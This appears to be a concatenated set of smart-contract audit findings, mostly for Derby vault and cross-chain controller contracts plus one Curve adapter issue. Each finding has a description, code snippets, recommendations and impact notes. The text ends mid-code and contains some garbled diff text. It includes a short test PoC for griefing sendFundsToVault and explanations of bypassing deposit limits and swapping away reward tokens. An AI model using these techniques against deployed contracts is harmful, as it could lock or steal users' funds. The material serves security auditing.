Rebalancing can get stuck indefinitely at the `pushVaultAmounts` step due to an error in the accounting of `totalWithdrawalRequests`. As a result, funds will be locked in vaults since requested withdrawals are only executed after a next successful rebalance.\\nFunds deposited to underlying protocols can only be withdrawn from vaults after a next successful rebalance:\\na depositor has to make a withdrawal request first, which is tracked in the current rebalance period;\\nrequested funds can be withdrawn in the next rebalance period.\\nThus, it's critical that rebalancing doesn't get stuck during one of its stages.\\nDuring rebalancing, vaults report their balances to `XChainController` via the pushTotalUnderlyingToController function: the functions sends the current unlocked (i.e. excluding reserved funds) underlying token balance of the vault and the total amount of withdrawn requests in the current period. The latter amount is stored in the `totalWithdrawalRequests` storage variable:\\nthe variable is increased when a new withdrawal request is made;\\nand it's set to 0 after the vault has been rebalanced-it's value is added to the reserved funds.\\nThe logic of `totalWithdrawalRequests` is that it tracks only the requested withdrawal amounts in the current period-this amount becomes reserved during rebalancing and is added to `reservedFunds` after the vault has been rebalanced.\\nWhen `XChainController` receives underlying balances and withdrawal requests from vaults, it tracks them internally. The amounts then used to calculate how much tokens a vault needs to send or receive after a rebalancing: the total withdrawal amount is subtracted from vault's underlying balance so that it's excluded from the amounts that will be sent to the protocols and so that it could then be added to the reserved funds of the vault.\\nHowever, `totalWithdrawalRequests` in `XChainController` is not reset between rebalancings: when a new rebalancing starts, `XChainController` receives allocations from the Game and calls `resetVaultUnderlying`, which resets the underlying balances receive from vaults in the previous rebalancing. `resetVaultUnderlying` doesn't set `totalWithdrawalRequests` to 0:\\n```\\nfunction resetVaultUnderlying(uint256 _vaultNumber) internal {\\n vaults[_vaultNumber].totalUnderlying = 0;\\n vaultStage[_vaultNumber].underlyingReceived = 0;\\n vaults[_vaultNumber].totalSupply = 0;\\n}\\n```\\n\\nThis cause the value of `totalWithdrawalRequests` to accumulate over time. At some point, the total historical amount of all withdrawal requests (which `totalWithdrawalRequests` actually tracks) will be greater than the underlying balance of a vault, and this line will revert due to an underflow in the subtraction:\\n```\\nuint256 totalUnderlying = getTotalUnderlyingVault(_vaultNumber) - totalWithdrawalRequests;\\n```\\n
In `XChainController.resetVaultUnderlying`, consider setting `vaults[_vaultNumber].totalWithdrawalRequests` to 0. `totalWithdrawalRequests`, like its `MainVault.totalWithdrawalRequests` counterpart, tracks withdrawal requests only in the current period and should be reset to 0 between rebalancings.
Due to accumulation of withdrawal request amounts in the `totalWithdrawalRequests` variable, `XChainController.pushVaultAmounts` can be blocked indefinitely after the value of `totalWithdrawalRequests` has grown bigger than the value of `totalUnderlying` of a vault. Since withdrawals from vaults are delayed and enable in a next rebalancing period, depositors may not be able to withdraw their funds from vaults, due to a block rebalancing.\\nWhile `XChainController` implements a bunch of functions restricted to the guardian that allow the guardian to push a rebalancing through, neither of these functions resets the value of `totalWithdrawalRequests`. If `totalWithdrawalRequests` becomes bigger than `totalUnderlying`, the guardian won't be able to fix the state of `XChainController` and push the rebalancing through.
```\\nfunction resetVaultUnderlying(uint256 _vaultNumber) internal {\\n vaults[_vaultNumber].totalUnderlying = 0;\\n vaultStage[_vaultNumber].underlyingReceived = 0;\\n vaults[_vaultNumber].totalSupply = 0;\\n}\\n```\\n
`XChainController::sendFundsToVault` can be griefed and leave `XChainController` in a bad state
medium
A user can grief the send funds to vault state transition during by calling `sendFundsToVault` multiple times with the same vault.\\nDuring rebalancing, some vaults might need funds sent to them. They will be in state `WaitingForFunds`. To transition from here any user can trigger `XChainController` to send them funds by calling `sendFundsToVault`.\\nThis is trigger per chain and will transfer funds from `XChainController` to the respective vaults on each chain.\\nAt the end, when the vaults on each chain are processed and either have gotten funds sent to them or didn't need to `sendFundsToVaults` will trigger the state for this `vaultNumber` to be reset.\\nHowever, when transferring funds, there's never any check that this chain has not already been processed. So any user could simply call this function for a vault that either has no funds to transfer or where there's enough funds in `XChainController` and trigger the state reset for the vault.\\nPoC in `xChaincontroller.test.ts`, run after 4.5) Trigger vaults to transfer funds to xChainController:\\n```\\n it('5) Grief xChainController send funds to vaults', async function () {\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n\\n expect(await xChainController.getFundsReceivedState(vaultNumber)).to.be.equal(0);\\n\\n expect(await vault3.state()).to.be.equal(3);\\n\\n // can't trigger state change anymore\\n await expect(xChainController.sendFundsToVault(vaultNumber, slippage, 1000, relayerFee, {value: parseEther('0.1'),})).to.be.revertedWith('Not all funds received');\\n });\\n```\\n
Issue `XChainController::sendFundsToVault` can be griefed and leave `XChainController` in a bad state\\nI recommend the protocol either keeps track of which vaults have been sent funds in `XChainController`.\\nor changes so a vault can only receive funds when waiting for them:\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/MainVault.sol b/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/MainVault.sol\\nindex 8739e24..d475ee6 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/MainVault.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/MainVault.sol\\n@@ // Remove the line below\\n328,7 // Add the line below\\n328,7 @@ contract MainVault is Vault, VaultToken {\\n /// @notice Step 5 end; Push funds from xChainController to vaults\\n /// @notice Receiving feedback from xController when funds are received, so the vault can rebalance\\n function receiveFunds() external onlyXProvider {\\n// Remove the line below\\n if (state != State.WaitingForFunds) return;\\n// Add the line below\\n require(state == State.WaitingForFunds,stateError);\\n settleReservedFunds();\\n }\\n \\n```\\n
XChainController ends up out of sync with the vault(s) that were supposed to receive funds.\\n`guardian` can resolve this by resetting the states using admin functions but these functions can still be frontrun by a malicious user.\\nUntil this is resolved the rebalancing of the impacted vaults cannot continue.
```\\n it('5) Grief xChainController send funds to vaults', async function () {\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });\\n\\n expect(await xChainController.getFundsReceivedState(vaultNumber)).to.be.equal(0);\\n\\n expect(await vault3.state()).to.be.equal(3);\\n\\n // can't trigger state change anymore\\n await expect(xChainController.sendFundsToVault(vaultNumber, slippage, 1000, relayerFee, {value: parseEther('0.1'),})).to.be.revertedWith('Not all funds received');\\n });\\n```\\n
Vault could `rebalance()` before funds arrive from xChainController
medium
Invoke sendFundsToVault() to Push funds from xChainController to vaults. which is call xTransferToVaults()\\nFor the cross-chain rebalancing `xTransferToVaults()` will execute this logic\\n```\\n // rest of code\\n pushFeedbackToVault(_chainId, _vault, _relayerFee);\\n xTransfer(_asset, _amount, _vault, _chainId, _slippage, _relayerFee);\\n // rest of code\\n```\\n\\n`pushFeedbackToVault()` Is to invoke receiveFunds() `pushFeedbackToVault()` always travel through the slow path\\n`xTransfer()` to transfer funds from one chain to another If fast liquidity is not available, the `xTransfer()` will go through the slow path.\\nThe vulnerability is if the `xcall()` of `pushFeedbackToVault()` excited successfully before `xTransfer()` transfer the funds to the vault, anyone can invoke rebalance() this will lead to rebalancing Vaults with Imperfect funds (this could be true only if funds that are expected to be received from XChainController are greater than `reservedFunds` and `liquidityPerc` together )\\nThe above scenario could be done in two possible cases 1- `xTransfer()` will go through the slow path but because High Slippage the cross-chain message will wait until slippage conditions improve (relayers will continuously re-attempt the transfer execution).\\n2- Connext Team says\\n```\\nAll messages are added to a Merkle root which is sent across chains every 30 mins\\nAnd then those messages are executed by off-chain actors called routers\\n\\nso it is indeed possible that messages are received out of order (and potentially with increased latency in between due to batch times) \\nFor "fast path" (unauthenticated) messages, latency is not a concern, but ordering may still be (this is an artifact of the chain itself too btw)\\none thing you can do is add a nonce to your messages so that you can yourself order them at destination\\n```\\n\\nso `pushFeedbackToVault()` and `xTransfer()` could be added to a different Merkle root and this will lead to executing `receiveFunds()` before funds arrive.
Check if funds are arrived or not
The vault could `rebalance()` before funds arrive from xChainController, this will reduce rewards
```\\n // rest of code\\n pushFeedbackToVault(_chainId, _vault, _relayerFee);\\n xTransfer(_asset, _amount, _vault, _chainId, _slippage, _relayerFee);\\n // rest of code\\n```\\n
Wrong calculation of `balanceBefore` and `balanceAfter` in deposit method
medium
Deposit method calculate net amount transferred from user. It use `reservedFunds` also in consideration when calculating `balanceBefore` and `balanceAfter` but it is not actually require.\\n```\\n uint256 balanceBefore = getVaultBalance() - reservedFunds;\\n vaultCurrency.safeTransferFrom(msg.sender, address(this), _amount);\\n uint256 balanceAfter = getVaultBalance() - reservedFunds;\\n uint256 amount = balanceAfter - balanceBefore;\\n```\\n\\nDeposit may fail when `reservedFunds` is greater than `getVaultBalance()`
Use below code. This is correct way of finding net amount transfer by depositor\\n```\\n uint256 balanceBefore = getVaultBalance();\\n vaultCurrency.safeTransferFrom(msg.sender, address(this), _amount);\\n uint256 balanceAfter = getVaultBalance();\\n uint256 amount = balanceAfter - balanceBefore;\\n```\\n
Deposit may fail when `reservedFunds` is greater than `getVaultBalance()`
```\\n uint256 balanceBefore = getVaultBalance() - reservedFunds;\\n vaultCurrency.safeTransferFrom(msg.sender, address(this), _amount);\\n uint256 balanceAfter = getVaultBalance() - reservedFunds;\\n uint256 amount = balanceAfter - balanceBefore;\\n```\\n
Malicious users could set allocations to a blacklist Protocol and break the rebalancing logic
medium
`game.sol` pushes `deltaAllocations` to vaults by pushAllocationsToVaults() and it deletes all the value of the `deltas`\\n```\\nvaults[_vaultNumber].deltaAllocationProtocol[_chainId][i] = 0;\\n```\\n\\nMalicious users could set allocations to a blacklist Protocol. If only one of the `Baskets` has a non-zero value to a Protocol on blacklist receiveProtocolAllocations() will revert `receiveProtocolAllocations().receiveProtocolAllocationsInt().setDeltaAllocationsInt()`\\n```\\n function setDeltaAllocationsInt(uint256 _protocolNum, int256 _allocation) internal {\\n require(!controller.getProtocolBlacklist(vaultNumber, _protocolNum), "Protocol on blacklist");\\n deltaAllocations[_protocolNum] += _allocation;\\n deltaAllocatedTokens += _allocation;\\n }\\n```\\n\\nand You won't be able to execute rebalance()
You should check if the Protocol on the blacklist when Game players `rebalanceBasket()`
The guardian isn't able to restart the protocol manually. `game.sol` loses the value of the `deltas`. The whole system is down.
```\\nvaults[_vaultNumber].deltaAllocationProtocol[_chainId][i] = 0;\\n```\\n
Asking for `balanceOf()` in the wrong address
medium
on sendFundsToVault() this logic\\n```\\naddress underlying = getUnderlyingAddress(_vaultNumber, _chain);\\nuint256 balance = IERC20(underlying).balanceOf(address(this));\\n```\\n\\nin case `_chainId` is Optimism the `underlying` address is for Optimism (L2) but `XChainController` is on Mainnet you can't invoke `balanceOf()` like this!!!
Issue Asking for `balanceOf()` in the wrong address\\n`getUnderlyingAddress(_vaultNumber, _chain);` should just be `getUnderlyingAddress(_vaultNumber);` so the `underlying` here\\n```\\nuint256 balance = IERC20(underlying).balanceOf(address(this));\\n```\\n\\nwill be always on the Mainnet
Asking for `balanceOf()` in the wrong address The protocol will be not able to rebalance the vault
```\\naddress underlying = getUnderlyingAddress(_vaultNumber, _chain);\\nuint256 balance = IERC20(underlying).balanceOf(address(this));\\n```\\n
`getDecimals()` always call the MainNet
medium
`XChainController.pushVaultAmounts()` is to push `exchangeRate` to the vaults. `XChainController.getVaultAddress()` returns the vault address of `vaultNumber` with the given `chainID`\\n`pushVaultAmounts()` invoke `xProvider.getDecimals()` internally to calculate `newExchangeRate`\\nThe xProvider.getDecimals() is always call the `address(vault)` from the MainNet. but `address(vault)` could be in any chain `XChainController.pushVaultAmounts()` could keep reverting with all the `chainID` (only the MainNet will be correct ) or it will return the wrong `decimals` values. (if the `address(vault)` is for other chain/L but it exist in the MainNet with a decimals())\\nthis will lead to a wrong `newExchangeRate`\\n```\\nuint256 newExchangeRate = (totalUnderlying * (10 ** decimals)) / totalSupply;\\n```\\n
You should invoke `getVaultAddress()` with `_chain` of the Mainnet. because all vaults have the same getDecimals (not all vaultNamber)
`pushVaultAmounts()` will keep reverting and this will break all rebalancing logic
```\\nuint256 newExchangeRate = (totalUnderlying * (10 ** decimals)) / totalSupply;\\n```\\n
User should not receive rewards for the rebalance period, when protocol was blacklisted, because of unpredicted behaviour of protocol price
medium
User should not receive rewards for the rebalance period, when protocol was blacklisted, because of unpredicted behaviour of protocol price.\\nWhen user allocates derby tokens to some underlying protocol, he receive rewards according to the exchange price of that protocols token. This reward can be positive or negative. Rewards of protocol are set to `Game` contract inside `settleRewards` function and they are accumulated for user, once he calls `rebalanceBasket`.\\n```\\n function storePriceAndRewards(uint256 _totalUnderlying, uint256 _protocolId) internal {\\n uint256 currentPrice = price(_protocolId);\\n if (lastPrices[_protocolId] == 0) {\\n lastPrices[_protocolId] = currentPrice;\\n return;\\n }\\n\\n\\n int256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);\\n int256 nominator = (int256(_totalUnderlying * performanceFee) * priceDiff);\\n int256 totalAllocatedTokensRounded = totalAllocatedTokens / 1E18;\\n int256 denominator = totalAllocatedTokensRounded * int256(lastPrices[_protocolId]) * 100; // * 100 cause perfFee is in percentages\\n\\n\\n if (totalAllocatedTokensRounded == 0) {\\n rewardPerLockedToken[rebalancingPeriod][_protocolId] = 0;\\n } else {\\n rewardPerLockedToken[rebalancingPeriod][_protocolId] = nominator / denominator;\\n }\\n\\n\\n lastPrices[_protocolId] = currentPrice;\\n }\\n```\\n\\nEvery time, previous price of protocol is compared with current price.\\nIn case if some protocol is hacked, there is `Vault.blacklistProtocol` function, that should withdraw reserves from protocol and mark it as blacklisted. The problem is that because of the hack it's not possible to determine what will happen with exhange rate of protocol. It can be 0, ot it can be very small or it can be high for any reasons. But protocol still accrues rewards per token for protocol, even that it is blacklisted. Because of that, user that allocated to that protocol can face with accruing very big negative or positive rewards. Both this cases are bad.\\nSo i believe that in case if protocol is blacklisted, it's better to set rewards as 0 for it.\\nExample. 1.User allocated 100 derby tokens for protocol A 2.Before `Vault.rebalance` call, protocol A was hacked which made it exchangeRate to be not real. 3.Derby team has blacklisted that protocol A. 4.Vault.rebalance is called which used new(incorrect) exchangeRate of protocol A in order to calculate `rewardPerLockedToken` 5.When user calls rebalance basket next time, his rewards are accumulated with extremely high/low value.
Issue User should not receive rewards for the rebalance period, when protocol was blacklisted, because of unpredicted behaviour of protocol price\\nIn case if protocol is blacklisted, then set `rewardPerLockedToken` to 0 inside `storePriceAndRewards` function.
User's rewards calculation is unpredictable.
```\\n function storePriceAndRewards(uint256 _totalUnderlying, uint256 _protocolId) internal {\\n uint256 currentPrice = price(_protocolId);\\n if (lastPrices[_protocolId] == 0) {\\n lastPrices[_protocolId] = currentPrice;\\n return;\\n }\\n\\n\\n int256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);\\n int256 nominator = (int256(_totalUnderlying * performanceFee) * priceDiff);\\n int256 totalAllocatedTokensRounded = totalAllocatedTokens / 1E18;\\n int256 denominator = totalAllocatedTokensRounded * int256(lastPrices[_protocolId]) * 100; // * 100 cause perfFee is in percentages\\n\\n\\n if (totalAllocatedTokensRounded == 0) {\\n rewardPerLockedToken[rebalancingPeriod][_protocolId] = 0;\\n } else {\\n rewardPerLockedToken[rebalancingPeriod][_protocolId] = nominator / denominator;\\n }\\n\\n\\n lastPrices[_protocolId] = currentPrice;\\n }\\n```\\n
The protocol could not handle multiple vaults correctly
medium
The protocol needs to handle multiple vaults correctly. If there are three vaults (e.g.USDC, USDT, DAI) the protocol needs to rebalance them all without any problems\\nThe protocol needs to invoke pushAllocationsToController() every `rebalanceInterval` to push totalDeltaAllocations from Game to xChainController.\\n`pushAllocationsToController()` invoke `rebalanceNeeded()` to check if a rebalance is needed based on the set interval and it uses the state variable `lastTimeStamp` to do the calculations\\n```\\n function rebalanceNeeded() public view returns (bool) {\\n return (block.timestamp - lastTimeStamp) > rebalanceInterval || msg.sender == guardian;\\n }\\n```\\n\\nBut in the first invoking (for USDC vault) of `pushAllocationsToController()` it will update the state variable `lastTimeStamp` to the current `block.timestamp`\\n```\\nlastTimeStamp = block.timestamp;\\n```\\n\\nNow when you invoke (for DAI vault) `pushAllocationsToController()`. It will revert because of\\n```\\nrequire(rebalanceNeeded(), "No rebalance needed");\\n```\\n\\nSo if the protocol has two vaults or more (USDC, USDT, DAI) you can only do one rebalance every `rebalanceInterval`
Keep tracking the `lastTimeStamp` for every `_vaultNumber` by using an array
The protocol could not handle multiple vaults correctly\\nBoth Users and Game players will lose funds because the MainVault will not rebalance the protocols at the right time with the right values
```\\n function rebalanceNeeded() public view returns (bool) {\\n return (block.timestamp - lastTimeStamp) > rebalanceInterval || msg.sender == guardian;\\n }\\n```\\n
Vault.blacklistProtocol can revert in emergency
medium
Vault.blacklistProtocol can revert in emergency, because it tries to withdraw underlying balance from protocol, which can revert for many reasons after it's hacked or paused.\\n```\\n function blacklistProtocol(uint256 _protocolNum) external onlyGuardian {\\n uint256 balanceProtocol = balanceUnderlying(_protocolNum);\\n currentAllocations[_protocolNum] = 0;\\n controller.setProtocolBlacklist(vaultNumber, _protocolNum);\\n savedTotalUnderlying -= balanceProtocol;\\n withdrawFromProtocol(_protocolNum, balanceProtocol);\\n }\\n```\\n\\nThe problem is that this function is trying to withdraw all balance from protocol. This can create problems as in case of hack, attacker can steal funds, pause protocol and any other things that can make `withdrawFromProtocol` function to revert. Because of that it will be not possible to add protocol to blacklist and as result system will stop working correctly.
Provide `needToWithdraw` param to the `blacklistProtocol` function. In case if it's safe to withdraw, then withdraw, otherwise, just set protocol as blacklisted. Also you can call function with `true` param again, once it's safe to withdraw. Example of hack situation flow: 1.underlying vault is hacked 2.you call setProtocolBlacklist("vault", false) which blacklists vault 3.in next tx you call setProtocolBlacklist("vault", true) and tries to withdraw
Hacked or paused protocol can't be set to blacklist.
```\\n function blacklistProtocol(uint256 _protocolNum) external onlyGuardian {\\n uint256 balanceProtocol = balanceUnderlying(_protocolNum);\\n currentAllocations[_protocolNum] = 0;\\n controller.setProtocolBlacklist(vaultNumber, _protocolNum);\\n savedTotalUnderlying -= balanceProtocol;\\n withdrawFromProtocol(_protocolNum, balanceProtocol);\\n }\\n```\\n
Game doesn't accrued rewards for previous rebalance period in case if rebalanceBasket is called in next period
medium
Game doesn't accrued rewards for previous rebalance period in case if `rebalanceBasket` is called in next period. Because of that user do not receive rewards for the previous period and in case if he calls `rebalanceBasket` each rebalance period, he will receive rewards only for last one.\\n```\\n function addToTotalRewards(uint256 _basketId) internal onlyBasketOwner(_basketId) {\\n if (baskets[_basketId].nrOfAllocatedTokens == 0) return;\\n\\n\\n uint256 vaultNum = baskets[_basketId].vaultNumber;\\n uint256 currentRebalancingPeriod = vaults[vaultNum].rebalancingPeriod;\\n uint256 lastRebalancingPeriod = baskets[_basketId].lastRebalancingPeriod;\\n\\n\\n if (currentRebalancingPeriod <= lastRebalancingPeriod) return;\\n\\n\\n for (uint k = 0; k < chainIds.length; k++) {\\n uint32 chain = chainIds[k];\\n uint256 latestProtocol = latestProtocolId[chain];\\n for (uint i = 0; i < latestProtocol; i++) {\\n int256 allocation = basketAllocationInProtocol(_basketId, chain, i) / 1E18;\\n if (allocation == 0) continue;\\n\\n\\n int256 lastRebalanceReward = getRewardsPerLockedToken(\\n vaultNum,\\n chain,\\n lastRebalancingPeriod,\\n i\\n );\\n int256 currentReward = getRewardsPerLockedToken(\\n vaultNum,\\n chain,\\n currentRebalancingPeriod,\\n i\\n );\\n baskets[_basketId].totalUnRedeemedRewards +=\\n (currentReward - lastRebalanceReward) *\\n allocation;\\n }\\n }\\n }\\n```\\n\\nThis function allows user to accrue rewards only when currentRebalancingPeriod > `lastRebalancingPeriod`. When user allocates, he allocates for the next period. And `lastRebalancingPeriod` is changed after `addToTotalRewards` is called, so after rewards for previous period accrued. And when allocations are sent to the xController, then new rebalance period is started. So actually rewards accruing for period that user allocated for is started once `pushAllocationsToController` is called. And at this point currentRebalancingPeriod == `lastRebalancingPeriod` which means that if user will call rebalanceBasket for next period, the rewards will not be accrued for him, but `lastRebalancingPeriod` will be incremented. So actually he will not receive rewards for previous period.\\nExample. 1.currentRebalancingPeriod is 10. 2.user calls `rebalanceBasket` with new allocation and `lastRebalancingPeriod` is set to 11 for him. 3.pushAllocationsToController is called, so `currentRebalancingPeriod` becomes 11. 4.settleRewards is called, so rewards for the 11th cycle are accrued. 5.now user can call `rebalanceBasket` for the next 12th cycle. `addToTotalRewards` is called, but `currentRebalancingPeriod == `lastRebalancingPeriod` == 11`, so rewards were not accrued for 11th cycle 6.new allocations is saved and `lastRebalancingPeriod` becomes 12. 7.the loop continues and every time when user allocates for next rewards his `lastRebalancingPeriod` is increased, but rewards are not added. 8.user will receive his rewards for previous cycle, only if he skip 1 rebalance period(he doesn't allocate on that period).\\nAs you can see this is very serious bug. Because of that, player that wants to adjust his allocation every rebalance period will loose all his rewards.
First of all, you need to allows to call `rebalanceBasket` only once per rebalance period, before new rebalancing period started and allocations are sent to xController. Then you need to change check inside `addToTotalRewards` to this `if (currentRebalancingPeriod < lastRebalancingPeriod) return;` in order to allow accruing for same period.
Player looses all his rewards
```\\n function addToTotalRewards(uint256 _basketId) internal onlyBasketOwner(_basketId) {\\n if (baskets[_basketId].nrOfAllocatedTokens == 0) return;\\n\\n\\n uint256 vaultNum = baskets[_basketId].vaultNumber;\\n uint256 currentRebalancingPeriod = vaults[vaultNum].rebalancingPeriod;\\n uint256 lastRebalancingPeriod = baskets[_basketId].lastRebalancingPeriod;\\n\\n\\n if (currentRebalancingPeriod <= lastRebalancingPeriod) return;\\n\\n\\n for (uint k = 0; k < chainIds.length; k++) {\\n uint32 chain = chainIds[k];\\n uint256 latestProtocol = latestProtocolId[chain];\\n for (uint i = 0; i < latestProtocol; i++) {\\n int256 allocation = basketAllocationInProtocol(_basketId, chain, i) / 1E18;\\n if (allocation == 0) continue;\\n\\n\\n int256 lastRebalanceReward = getRewardsPerLockedToken(\\n vaultNum,\\n chain,\\n lastRebalancingPeriod,\\n i\\n );\\n int256 currentReward = getRewardsPerLockedToken(\\n vaultNum,\\n chain,\\n currentRebalancingPeriod,\\n i\\n );\\n baskets[_basketId].totalUnRedeemedRewards +=\\n (currentReward - lastRebalanceReward) *\\n allocation;\\n }\\n }\\n }\\n```\\n
MainVault.rebalanceXChain doesn't check that savedTotalUnderlying >= reservedFunds
medium
MainVault.rebalanceXChain doesn't check that savedTotalUnderlying >= reservedAmount. Because of that, shortage can occur, if vault will lose some underlying during cross chain calls and reservedFundswill not be present in the vault.\\n`reservedFunds` is the amount that is reserved to be withdrawn by users. It's increased by `totalWithdrawalRequests` amount every cycle, when `setXChainAllocation` is called.\\n`setXChainAllocation` call is initiated by xController. This call provides vault with information about funds. In case if vault should send funds to the xController, then `SendingFundsXChain` state is set, aslo amount to send is stored.\\n```\\n function rebalanceXChain(uint256 _slippage, uint256 _relayerFee) external payable {\\n require(state == State.SendingFundsXChain, stateError);\\n\\n\\n if (amountToSendXChain > getVaultBalance()) pullFunds(amountToSendXChain);\\n if (amountToSendXChain > getVaultBalance()) amountToSendXChain = getVaultBalance();\\n\\n\\n vaultCurrency.safeIncreaseAllowance(xProvider, amountToSendXChain);\\n IXProvider(xProvider).xTransferToController{value: msg.value}(\\n vaultNumber,\\n amountToSendXChain,\\n address(vaultCurrency),\\n _slippage,\\n _relayerFee\\n );\\n\\n\\n emit RebalanceXChain(vaultNumber, amountToSendXChain, address(vaultCurrency));\\n\\n\\n amountToSendXChain = 0;\\n settleReservedFunds();\\n }\\n```\\n\\nAs you can see, function just pulls needed funds from providers if needed and sends them to xController. It doesn't check that after that amount that is held by vault is enough to cover `reservedFunds`. Because of that next situation can occur.\\n1.Suppose that vault has 1000 tokens as underlying amount. 2.reservedFunds is 200. 3.xController calculated that vault should send 800 tokens to xController(vault allocations is 0) and 200 should be still in the vault in order to cover `reservedFunds`. 4.when vault is going to send 800 tokens(between `setXChainAllocation` and `rebalanceXChain` call), then loss happens and totalUnderlying becomes 800, so currently vault has only 800 tokens in total. 5.vault sends this 800 tokens to xController and has 0 to cover `reservedFunds`, but actually he should leave this 200 tokens in the vault in this case.\\n```\\n if (amountToSendXChain > getVaultBalance()) pullFunds(amountToSendXChain);\\n if (amountToSendXChain > getVaultBalance()) amountToSendXChain = getVaultBalance();\\n```\\n\\nI think that this is incorrect approach for withdrawing of funds as there is a risk that smth will happen with underlying amount in the providers, so it will be not enough to cover `reservedFunds` and calculations will be broken, users will not be able to withdraw. Same approach is done in `rebalance` function, which pulls `reservedFunds` after depositing to all providers. I guess that correct approach is not to touch `reservedFunds` amount. In case if you need to send amount to xController, then you need to withdraw it directly from provider. Of course if you have `getVaultBalance` that is bigger than `reservedFunds + amountToSendXChain`, then you can send them directly, without pulling.
You need to check that after you send funds to xController it's enough funds to cover `reservedFunds`.
Reserved funds protection can be broken
```\\n function rebalanceXChain(uint256 _slippage, uint256 _relayerFee) external payable {\\n require(state == State.SendingFundsXChain, stateError);\\n\\n\\n if (amountToSendXChain > getVaultBalance()) pullFunds(amountToSendXChain);\\n if (amountToSendXChain > getVaultBalance()) amountToSendXChain = getVaultBalance();\\n\\n\\n vaultCurrency.safeIncreaseAllowance(xProvider, amountToSendXChain);\\n IXProvider(xProvider).xTransferToController{value: msg.value}(\\n vaultNumber,\\n amountToSendXChain,\\n address(vaultCurrency),\\n _slippage,\\n _relayerFee\\n );\\n\\n\\n emit RebalanceXChain(vaultNumber, amountToSendXChain, address(vaultCurrency));\\n\\n\\n amountToSendXChain = 0;\\n settleReservedFunds();\\n }\\n```\\n
maxTrainingDeposit can be bypassed
medium
It was observed that User can bypass the `maxTrainingDeposit` by transferring balance from one user to another\\nObserve the `deposit` function\\n```\\nfunction deposit(\\n uint256 _amount,\\n address _receiver\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 shares) {\\n if (training) {\\n require(whitelist[msg.sender]);\\n uint256 balanceSender = (balanceOf(msg.sender) * exchangeRate) / (10 ** decimals());\\n require(_amount + balanceSender <= maxTrainingDeposit);\\n }\\n// rest of code\\n```\\n\\nSo if User balance exceeds maxTrainingDeposit then request fails (considering training is true)\\nLets say User A has balance of 50 and maxTrainingDeposit is 100\\nIf User A deposit amount 51 then it fails since 50+51<=100 is false\\nSo User A transfer amount 50 to his another account\\nNow when User A deposit, it does not fail since `0+51<=100`
Issue maxTrainingDeposit can be bypassed\\nIf user specific limit is required then transfer should be check below:\\n```\\n require(_amountTransferred + balanceRecepient <= maxTrainingDeposit);\\n```\\n
User can bypass maxTrainingDeposit and deposit more than allowed
```\\nfunction deposit(\\n uint256 _amount,\\n address _receiver\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 shares) {\\n if (training) {\\n require(whitelist[msg.sender]);\\n uint256 balanceSender = (balanceOf(msg.sender) * exchangeRate) / (10 ** decimals());\\n require(_amount + balanceSender <= maxTrainingDeposit);\\n }\\n// rest of code\\n```\\n
Risk of reward tokens being sold by malicious users under certain conditions
high
Due to the lack of validation of the selling token within the Curve adaptors, there is a risk that the reward tokens or Convex deposit tokens of the vault being sold by malicious users under certain conditions (e.g. if reward tokens equal to primary/secondary tokens OR a new exploit is found in other parts of the code).\\nFor a `EXACT_IN_SINGLE` trade within the Curve adaptors, the `from` and `to` addresses of the `exchange` function are explicitly set `to` `trade.sellToken` and `trade.buyToken` respectively. Thus, the swap is restricted `to` only `trade.sellToken` and `trade.buyToken`, which points `to` either the primary or secondary token of the pool. This prevents other tokens that reside in the vault `from` being swapped out.\\nHowever, this measure was not applied to the `EXACT_IN_BATCH` trade as it ignores the `trade.sellToken` and `trade.buyToken` , and allow the caller to define arbitrary `data.route` where the first route (_route[0]) and last route (_route[last_index]) could be any token.\\nThe vault will hold the reward tokens (CRV, CVX, LDO) when the vault administrator claims the rewards or a malicious user claims the rewards on behalf of the vault by calling Convex's getReward function.\\nAssume that attacker is faster than the admin calling the reinvest function. There is a possibility that an attacker executes a `EXACT_IN_BATCH` trade and specifies the `_route[0]` as one of the reward tokens residing on the vault and swaps away the reward tokens during depositing (_tradePrimaryForSecondary) or redemption (_sellSecondaryBalance). In addition, an attacker could also sell away the Convex deposit tokens if a new exploit is found.\\nIn addition, the vault also holds Convex deposit tokens, which represent assets held by the vault.\\nThis issue affects the in-scope `CurveV2Adapter` and `CurveAdapter` since they do not validate the `data.route` provided by the users.\\nCurveV2Adapter\\n```\\nFile: CurveV2Adapter.sol\\n function getExecutionData(address from, Trade calldata trade)\\n internal view returns (\\n address spender,\\n address target,\\n uint256 msgValue,\\n bytes memory executionCallData\\n )\\n {\\n if (trade.tradeType == TradeType.EXACT_IN_SINGLE) {\\n CurveV2SingleData memory data = abi.decode(trade.exchangeData, (CurveV2SingleData));\\n executionCallData = abi.encodeWithSelector(\\n ICurveRouterV2.exchange.selector,\\n data.pool,\\n _getTokenAddress(trade.sellToken),\\n _getTokenAddress(trade.buyToken),\\n trade.amount,\\n trade.limit,\\n address(this)\\n );\\n } else if (trade.tradeType == TradeType.EXACT_IN_BATCH) {\\n CurveV2BatchData memory data = abi.decode(trade.exchangeData, (CurveV2BatchData));\\n // Array of pools for swaps via zap contracts. This parameter is only needed for\\n // Polygon meta-factories underlying swaps.\\n address[4] memory pools;\\n executionCallData = abi.encodeWithSelector(\\n ICurveRouterV2.exchange_multiple.selector,\\n data.route,\\n data.swapParams,\\n trade.amount,\\n trade.limit,\\n 